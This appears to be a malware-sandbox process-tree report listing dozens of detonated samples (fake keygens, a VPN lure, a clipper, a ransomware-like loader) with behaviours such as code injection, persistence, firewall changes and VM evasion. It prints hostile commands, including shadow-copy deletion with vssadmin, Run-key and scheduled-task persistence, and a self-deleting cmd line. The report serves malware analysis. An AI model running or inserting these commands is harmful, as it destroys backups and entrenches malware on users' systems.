C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- Modifies firewall policy service
- Event Triggered Execution: Image File Execution Options Injection
- Checks BIOS information in registry
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:5240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 11368⤵
- Program crash
PID:332
-
-
-
-
-
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe/prstb5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4612 -
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:3704 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- Modifies firewall policy service
- Event Triggered Execution: Image File Execution Options Injection
- Checks BIOS information in registry
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:5208 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 11528⤵
- Program crash
PID:5504
-
-
-
-
-
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe/prstb5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5652 -
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:3836 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- Modifies firewall policy service
- Event Triggered Execution: Image File Execution Options Injection
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:5768 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 10928⤵
- Program crash
PID:5920
-
-
-
-
-
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe/prstb5⤵
- Suspicious use of SetThreadContext
PID:5980 -
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"6⤵
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:3336 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- Modifies firewall policy service
- Event Triggered Execution: Image File Execution Options Injection
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:3332 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3332 -s 11488⤵
- Program crash
PID:6020
-
-
-
-
-
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe/prstb5⤵
- Suspicious use of SetThreadContext
PID:4256 -
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"6⤵
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:1448 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- Modifies firewall policy service
- Event Triggered Execution: Image File Execution Options Injection
- Checks BIOS information in registry
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:6028 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6028 -s 11408⤵
- Program crash
PID:2076
-
-
-
-
-
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe/prstb5⤵
- Suspicious use of SetThreadContext
PID:1636 -
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"6⤵
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:1048 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- Modifies firewall policy service
- Event Triggered Execution: Image File Execution Options Injection
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:5396 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 11288⤵
- Program crash
PID:4492
-
-
-
-
-
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe/prstb5⤵
- Suspicious use of SetThreadContext
PID:5068 -
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"6⤵
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:3100 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- Modifies firewall policy service
- Event Triggered Execution: Image File Execution Options Injection
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:5828 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 11728⤵
- Program crash
PID:1180
-
-
-
-
-
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe/prstb5⤵PID:6172
-
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"6⤵PID:8628
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵PID:10736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10736 -s 11688⤵
- Program crash
PID:8892
-
-
-
-
-
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe/prstb5⤵PID:5148
-
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"6⤵PID:10740
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵PID:9168
-
-
-
-
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe/prstb5⤵PID:6208
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F07A08\VyprVPN.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F07A08\VyprVPN.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Users\Admin\AppData\Roaming\1337\joinResult.exe"C:\Users\Admin\AppData\Roaming\1337\joinResult.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Users\Admin\AppData\Roaming\1337\1111.exe"C:\Users\Admin\AppData\Roaming\1337\1111.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2976 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 3 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\1337\1111.exe"6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4196 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 3 -w 30007⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1616
-
-
-
-
C:\Users\Admin\AppData\Roaming\1337\Clipper.exe"C:\Users\Admin\AppData\Roaming\1337\Clipper.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Windows Service" /tr "C:\Users\Admin\WinService.exe" /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:2728
-
-
C:\Users\Admin\WinService.exe"C:\Users\Admin\WinService.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
-
-
C:\Users\Admin\AppData\Roaming\1337\VyprVPN.exe"C:\Users\Admin\AppData\Roaming\1337\VyprVPN.exe"4⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- System Location Discovery: System Language Discovery
PID:3964
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42FF3A08\WSHSetup[1].exe"C:\Users\Admin\AppData\Local\Temp\7zO42FF3A08\WSHSetup[1].exe"3⤵
- Executes dropped EXE
PID:3636 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 14724⤵
- Program crash
PID:3064
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42FA6B08\starticon3.exe"C:\Users\Admin\AppData\Local\Temp\7zO42FA6B08\starticon3.exe"3⤵
- Executes dropped EXE
PID:3332 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3332 -s 3004⤵
- Program crash
PID:4608
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F2D808\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F2D808\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe"3⤵
- Executes dropped EXE
PID:4852 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 2284⤵
- Program crash
PID:3192
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\7zO42F70EE8\vir1.xls"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3760
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F6DEE8\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F6DEE8\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe"3⤵
- Executes dropped EXE
PID:2612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 3004⤵
- Program crash
PID:4716
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F7E109\svchost.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F7E109\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4656 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"4⤵
- Looks for VMWare services registry key.
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4360 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2988
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 15125⤵
- Program crash
PID:3216
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42FAB639\Lonelyscreen.1.2.9.keygen.by.Paradox.exe"C:\Users\Admin\AppData\Local\Temp\7zO42FAB639\Lonelyscreen.1.2.9.keygen.by.Paradox.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4768 -
C:\ProgramData\Google Updater 2.0\ymy9m915c99k95m.exe/prstb4⤵
- Executes dropped EXE
PID:6064
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F5C739\LtHv0O2KZDK4M637.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F5C739\LtHv0O2KZDK4M637.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1048
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F13439\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F13439\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:904 -
C:\ProgramData\Google Updater 2.0\ymy9m915c99k95m.exe/prstb4⤵
- Executes dropped EXE
PID:5984
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42FA2539\Magic_File_v3_keygen_by_KeygenNinja.exe"C:\Users\Admin\AppData\Local\Temp\7zO42FA2539\Magic_File_v3_keygen_by_KeygenNinja.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2960
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F50239\OnlineInstaller.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F50239\OnlineInstaller.exe"3⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3116 -
C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmpC:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp -install4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2940
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F07339\SecurityTaskManager_Setup.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F07339\SecurityTaskManager_Setup.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2448 -
C:\Users\Admin\AppData\Local\Temp\WZSE0.TMP\setup.exe".\setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1160 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" "C:\Program Files (x86)\Security Task Manager\taskman.exe"5⤵PID:1384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42FAA339\mouse_2.exe"C:\Users\Admin\AppData\Local\Temp\7zO42FAA339\mouse_2.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3600 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 15324⤵
- Program crash
PID:5228
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F6F039\openme.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F6F039\openme.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2300 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122884⤵PID:2088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 10324⤵
- Program crash
PID:1324
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42FAFE39\oof.exe"C:\Users\Admin\AppData\Local\Temp\7zO42FAFE39\oof.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\7zO42FAFE39\oof.exe"C:\Users\Admin\AppData\Local\Temp\7zO42FAFE39\oof.exe"4⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Checks whether UAC is enabled
- Indicator Removal: Clear Persistence
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:4420 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe5⤵
- Modifies firewall policy service
- Event Triggered Execution: Image File Execution Options Injection
- Looks for VMWare services registry key.
- Checks BIOS information in registry
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:2580 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2580 -s 12686⤵
- Program crash
PID:5424
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F76F39\ou55sg33s_1.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F76F39\ou55sg33s_1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4608 -
C:\Users\Admin\AppData\Local\Temp\7zO42F76F39\ou55sg33s_1.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F76F39\ou55sg33s_1.exe"4⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Checks whether UAC is enabled
- Indicator Removal: Clear Persistence
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2924 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe5⤵
- Modifies firewall policy service
- Event Triggered Execution: Image File Execution Options Injection
- Looks for VMWare services registry key.
- Checks BIOS information in registry
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:3220 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3220 -s 11806⤵
- Program crash
PID:5344
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42FBEC49\KLwC6vii.exe"C:\Users\Admin\AppData\Local\Temp\7zO42FBEC49\KLwC6vii.exe"3⤵
- Executes dropped EXE
PID:224
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F503AB\31.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F503AB\31.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:4280 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A64F.tmp\A650.tmp\A651.bat C:\Users\Admin\AppData\Local\Temp\7zO42F503AB\31.exe"4⤵
- Modifies registry class
PID:1692 -
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\1.jar"5⤵
- Suspicious use of SetWindowsHookEx
PID:4480
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe5⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:332 -
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5264
-
-
-
C:\Users\Admin\AppData\Roaming\3.exeC:\Users\Admin\AppData\Roaming\3.exe5⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:5976 -
C:\Users\Admin\AppData\Roaming\3.exeC:\Users\Admin\AppData\Roaming\3.exe6⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2016
-
-
-
C:\Users\Admin\AppData\Roaming\4.exeC:\Users\Admin\AppData\Roaming\4.exe5⤵PID:1520
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2766⤵
- Program crash
PID:7340
-
-
-
C:\Users\Admin\AppData\Roaming\5.exeC:\Users\Admin\AppData\Roaming\5.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:2924
-
-
C:\Users\Admin\AppData\Roaming\6.exeC:\Users\Admin\AppData\Roaming\6.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:5856
-
-
C:\Users\Admin\AppData\Roaming\7.exeC:\Users\Admin\AppData\Roaming\7.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:2720
-
-
C:\Users\Admin\AppData\Roaming\8.exeC:\Users\Admin\AppData\Roaming\8.exe5⤵PID:2552
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"6⤵PID:5284
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"7⤵
- Adds Run key to start application
PID:1548
-
-
-
-
C:\Users\Admin\AppData\Roaming\9.exeC:\Users\Admin\AppData\Roaming\9.exe5⤵PID:4136
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wWTxgR" /XML "C:\Users\Admin\AppData\Local\Temp\tmp33F8.tmp"6⤵
- Scheduled Task/Job: Scheduled Task
PID:260
-
-
-
C:\Users\Admin\AppData\Roaming\10.exeC:\Users\Admin\AppData\Roaming\10.exe5⤵PID:1508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1508 -s 2526⤵
- Program crash
PID:8556
-
-
-
C:\Users\Admin\AppData\Roaming\11.exeC:\Users\Admin\AppData\Roaming\11.exe5⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
PID:4244 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE9DF.tmp"6⤵
- Scheduled Task/Job: Scheduled Task
PID:6700
-
-
C:\Users\Admin\AppData\Roaming\11.exe"{path}"6⤵PID:8312
-
-
-
C:\Users\Admin\AppData\Roaming\12.exeC:\Users\Admin\AppData\Roaming\12.exe5⤵PID:4116
-
-
C:\Users\Admin\AppData\Roaming\13.exeC:\Users\Admin\AppData\Roaming\13.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:6132 -
C:\Users\Admin\AppData\Roaming\13.exeC:\Users\Admin\AppData\Roaming\13.exe6⤵PID:4716
-
-
-
C:\Users\Admin\AppData\Roaming\14.exeC:\Users\Admin\AppData\Roaming\14.exe5⤵PID:2456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 2486⤵
- Program crash
PID:8276
-
-
-
C:\Users\Admin\AppData\Roaming\15.exeC:\Users\Admin\AppData\Roaming\15.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6128
-
-
C:\Users\Admin\AppData\Roaming\16.exeC:\Users\Admin\AppData\Roaming\16.exe5⤵
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:5804 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"6⤵PID:5580
-
C:\Windows\system32\mode.commode con cp select=12517⤵PID:8432
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet7⤵
- Interacts with shadow copies
PID:10276
-
-
-
-
C:\Users\Admin\AppData\Roaming\17.exeC:\Users\Admin\AppData\Roaming\17.exe5⤵PID:1616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 2526⤵
- Program crash
PID:8136
-
-
-
C:\Users\Admin\AppData\Roaming\18.exeC:\Users\Admin\AppData\Roaming\18.exe5⤵
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
PID:4956
-
-
C:\Users\Admin\AppData\Roaming\19.exeC:\Users\Admin\AppData\Roaming\19.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2992
-
-
C:\Users\Admin\AppData\Roaming\20.exeC:\Users\Admin\AppData\Roaming\20.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:3440 -
C:\Users\Admin\AppData\Roaming\20.exeC:\Users\Admin\AppData\Roaming\20.exe6⤵PID:6328
-
-
-
C:\Users\Admin\AppData\Roaming\21.exeC:\Users\Admin\AppData\Roaming\21.exe5⤵
- Suspicious use of SetThreadContext
PID:1932 -
C:\Users\Admin\AppData\Roaming\21.exe"{path}"6⤵PID:6084
-
-
C:\Users\Admin\AppData\Roaming\21.exe"{path}"6⤵PID:7600
-
-
C:\Users\Admin\AppData\Roaming\21.exe"{path}"6⤵PID:7976
-
-
-
C:\Users\Admin\AppData\Roaming\22.exeC:\Users\Admin\AppData\Roaming\22.exe5⤵PID:4332
-
-
C:\Users\Admin\AppData\Roaming\23.exeC:\Users\Admin\AppData\Roaming\23.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:732
-
-
C:\Users\Admin\AppData\Roaming\24.exeC:\Users\Admin\AppData\Roaming\24.exe5⤵PID:3956
-
C:\Users\Admin\AppData\Roaming\24.exe"{path}"6⤵PID:6300
-
-
C:\Users\Admin\AppData\Roaming\24.exe"{path}"6⤵PID:6768
-
-
-
C:\Users\Admin\AppData\Roaming\25.exeC:\Users\Admin\AppData\Roaming\25.exe5⤵PID:280
-
-
C:\Users\Admin\AppData\Roaming\26.exeC:\Users\Admin\AppData\Roaming\26.exe5⤵PID:2840
-
-
C:\Users\Admin\AppData\Roaming\27.exeC:\Users\Admin\AppData\Roaming\27.exe5⤵PID:5044
-
C:\Users\Admin\AppData\Roaming\27.exeC:\Users\Admin\AppData\Roaming\27.exe /C6⤵PID:7036
-
-
-
C:\Users\Admin\AppData\Roaming\28.exeC:\Users\Admin\AppData\Roaming\28.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:5564
-
-
C:\Users\Admin\AppData\Roaming\29.exeC:\Users\Admin\AppData\Roaming\29.exe5⤵PID:1976
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1976 -s 2686⤵
- Program crash
PID:6476
-
-
-
C:\Users\Admin\AppData\Roaming\30.exeC:\Users\Admin\AppData\Roaming\30.exe5⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5788 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\MSBuild.exe"6⤵PID:8540
-
-
-
C:\Users\Admin\AppData\Roaming\31.exeC:\Users\Admin\AppData\Roaming\31.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:5380
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F070AB\3DMark 11 Advanced Edition.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F070AB\3DMark 11 Advanced Edition.exe"3⤵
- Checks whether UAC is enabled
PID:5484
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42FDD0AB\42f972925508a82236e8533567487761.exe"C:\Users\Admin\AppData\Local\Temp\7zO42FDD0AB\42f972925508a82236e8533567487761.exe"3⤵
- Checks whether UAC is enabled
PID:5000
-
-
